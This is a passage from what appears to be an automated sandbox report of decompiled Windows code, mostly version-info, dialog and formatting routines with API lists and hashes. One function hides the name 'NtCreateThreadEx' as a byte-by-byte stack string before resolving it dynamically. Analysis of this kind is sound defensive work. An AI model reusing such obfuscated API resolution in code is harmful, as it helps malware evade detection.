						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                0x0040b04d
                                                                                                                0x0040b05e
                                                                                                                0x0040b060
                                                                                                                0x0040b063
                                                                                                                0x0040b06a
                                                                                                                0x0040b06d
                                                                                                                0x0040b076
                                                                                                                0x0040b07b
                                                                                                                0x0040b07e
                                                                                                                0x0040b084
                                                                                                                0x0040b08e
                                                                                                                0x0040b0a8
                                                                                                                0x0040b0aa
                                                                                                                0x0040b0ad
                                                                                                                0x0040b0b0
                                                                                                                0x0040b0b3
                                                                                                                0x0040b0b6
                                                                                                                0x0040b0b8
                                                                                                                0x0040b0bb
                                                                                                                0x0040b0be
                                                                                                                0x0040b0c1
                                                                                                                0x0040b0c4
                                                                                                                0x0040b0c7
                                                                                                                0x0040b0ca
                                                                                                                0x0040b0cd
                                                                                                                0x0040b0cd
                                                                                                                0x0040b0e5
                                                                                                                0x0040b11f
                                                                                                                0x0040b128
                                                                                                                0x0040b0e7
                                                                                                                0x0040b0e7
                                                                                                                0x0040b0f1
                                                                                                                0x0040b0f2
                                                                                                                0x0040b0f3
                                                                                                                0x0040b0fb
                                                                                                                0x0040b0fd
                                                                                                                0x0040b0fe
                                                                                                                0x0040b11d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040b11d
                                                                                                                0x0040b13c
                                                                                                                0x0040b151
                                                                                                                0x0040b166
                                                                                                                0x0040b17b
                                                                                                                0x0040b190
                                                                                                                0x0040b1a5
                                                                                                                0x0040b1ba
                                                                                                                0x0040b1cf
                                                                                                                0x0040b1d6
                                                                                                                0x0040b1d7
                                                                                                                0x0040b1d8
                                                                                                                0x0040b1de
                                                                                                                0x0040b1e3

                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                • wcscpy.MSVCRT ref: 0040B128
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 1223191525-1542517562
                                                                                                                • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                0x0040a1f8
                                                                                                                0x0040a26d
                                                                                                                0x00000000
                                                                                                                0x0040a26f
                                                                                                                0x0040a205
                                                                                                                0x0040a20b
                                                                                                                0x0040a20d
                                                                                                                0x0040a213
                                                                                                                0x0040a214
                                                                                                                0x0040a215
                                                                                                                0x0040a216
                                                                                                                0x0040a217
                                                                                                                0x0040a219
                                                                                                                0x0040a21f
                                                                                                                0x0040a223
                                                                                                                0x0040a227
                                                                                                                0x0040a22b
                                                                                                                0x0040a22f
                                                                                                                0x0040a233
                                                                                                                0x0040a237
                                                                                                                0x0040a23b
                                                                                                                0x0040a23f
                                                                                                                0x0040a243
                                                                                                                0x0040a247
                                                                                                                0x0040a24b
                                                                                                                0x0040a24f
                                                                                                                0x0040a253
                                                                                                                0x0040a257
                                                                                                                0x0040a25b
                                                                                                                0x0040a25f
                                                                                                                0x0040a269
                                                                                                                0x00000000
                                                                                                                0x0040a26c
                                                                                                                0x0040a271

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                • API String ID: 2574300362-1257427173
                                                                                                                • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                0x00407f9b
                                                                                                                0x00407fa3
                                                                                                                0x00407fad
                                                                                                                0x00407fb9
                                                                                                                0x0040802e
                                                                                                                0x00408032
                                                                                                                0x00408038
                                                                                                                0x0040803e
                                                                                                                0x00407fbb
                                                                                                                0x00407fc9
                                                                                                                0x00407fd0
                                                                                                                0x00407fe0
                                                                                                                0x00407fe5
                                                                                                                0x00407ff7
                                                                                                                0x00408015
                                                                                                                0x0040801b
                                                                                                                0x00408021
                                                                                                                0x00408021
                                                                                                                0x00408051
                                                                                                                0x00408051
                                                                                                                0x00408059
                                                                                                                0x00408065
                                                                                                                0x00408069
                                                                                                                0x0040806f
                                                                                                                0x00408087
                                                                                                                0x00408087
                                                                                                                0x0040809c
                                                                                                                0x004080bb
                                                                                                                0x004080d1
                                                                                                                0x004080de
                                                                                                                0x004080e2
                                                                                                                0x004080ea
                                                                                                                0x004080fb
                                                                                                                0x00408105
                                                                                                                0x00408115
                                                                                                                0x00408121
                                                                                                                0x00408127
                                                                                                                0x00408150

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407FD0
                                                                                                                • memset.MSVCRT ref: 00407FE5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                • LoadImageW.USER32 ref: 004080B4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                • LoadImageW.USER32 ref: 004080D1
                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 304928396-0
                                                                                                                • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                0x0040ae90
                                                                                                                0x0040aeab
                                                                                                                0x0040aeb2
                                                                                                                0x0040aec0
                                                                                                                0x0040aec7
                                                                                                                0x0040aecc
                                                                                                                0x0040aed3
                                                                                                                0x0040aeda
                                                                                                                0x0040aee1
                                                                                                                0x0040aee1
                                                                                                                0x0040aee7
                                                                                                                0x0040aeea
                                                                                                                0x0040aeed
                                                                                                                0x0040aef9
                                                                                                                0x0040aefe
                                                                                                                0x0040af05
                                                                                                                0x0040af07
                                                                                                                0x0040af08
                                                                                                                0x0040af13
                                                                                                                0x0040af18
                                                                                                                0x0040af19
                                                                                                                0x0040af26
                                                                                                                0x0040af2b
                                                                                                                0x0040af2b
                                                                                                                0x0040af2e
                                                                                                                0x0040af34
                                                                                                                0x0040af43
                                                                                                                0x0040af44
                                                                                                                0x0040af4f
                                                                                                                0x0040af54
                                                                                                                0x0040af55
                                                                                                                0x0040af62
                                                                                                                0x0040af67
                                                                                                                0x0040af70
                                                                                                                0x0040af76
                                                                                                                0x0040af7a
                                                                                                                0x0040af82
                                                                                                                0x0040af88
                                                                                                                0x0040af8d
                                                                                                                0x0040af97
                                                                                                                0x0040af9f
                                                                                                                0x0040afa5
                                                                                                                0x0040afa9
                                                                                                                0x0040afb1
                                                                                                                0x0040afb7
                                                                                                                0x0040afbd

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                0x00403c09
                                                                                                                0x00403c0c
                                                                                                                0x00403c11
                                                                                                                0x00403c1b
                                                                                                                0x00403c3f
                                                                                                                0x00403c4a
                                                                                                                0x00403c6e
                                                                                                                0x00403c96
                                                                                                                0x00403c9a
                                                                                                                0x00403ca6
                                                                                                                0x00403cb3
                                                                                                                0x00403cb8
                                                                                                                0x00403cc5
                                                                                                                0x00403cca
                                                                                                                0x00403cdd
                                                                                                                0x00403ce6
                                                                                                                0x00403cf8
                                                                                                                0x00403d11
                                                                                                                0x00403d26
                                                                                                                0x00403d3f
                                                                                                                0x00403d54
                                                                                                                0x00403d6d
                                                                                                                0x00403d76
                                                                                                                0x00403d88
                                                                                                                0x00403d9e
                                                                                                                0x00403db0
                                                                                                                0x00403db5
                                                                                                                0x00403dc4
                                                                                                                0x00403dc8
                                                                                                                0x00403dc9
                                                                                                                0x00403dca
                                                                                                                0x00403dda
                                                                                                                0x00403ddf
                                                                                                                0x00403de2
                                                                                                                0x00403de3
                                                                                                                0x00403df4
                                                                                                                0x00403df8
                                                                                                                0x00403df9
                                                                                                                0x00403dfa
                                                                                                                0x00403e0a
                                                                                                                0x00403e0f
                                                                                                                0x00403e12
                                                                                                                0x00403e13
                                                                                                                0x00403e22
                                                                                                                0x00403e26
                                                                                                                0x00403e28
                                                                                                                0x00403e29
                                                                                                                0x00403e39
                                                                                                                0x00403e3e
                                                                                                                0x00403e41
                                                                                                                0x00403e42
                                                                                                                0x00403e51
                                                                                                                0x00403e55
                                                                                                                0x00403e57
                                                                                                                0x00403e58
                                                                                                                0x00403e68
                                                                                                                0x00403e6d
                                                                                                                0x00403e70
                                                                                                                0x00403e71
                                                                                                                0x00403e71
                                                                                                                0x00403e87
                                                                                                                0x00403e8d
                                                                                                                0x00403e9e
                                                                                                                0x00403ea6
                                                                                                                0x00403eaf
                                                                                                                0x00403ebc

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                  • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                • LoadImageW.USER32 ref: 00403C6A
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                • LoadImageW.USER32 ref: 00403C7F
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                  • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                  • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • GetDlgItem.USER32 ref: 00403D64
                                                                                                                • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                • GetDlgItem.USER32 ref: 00403E20
                                                                                                                • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
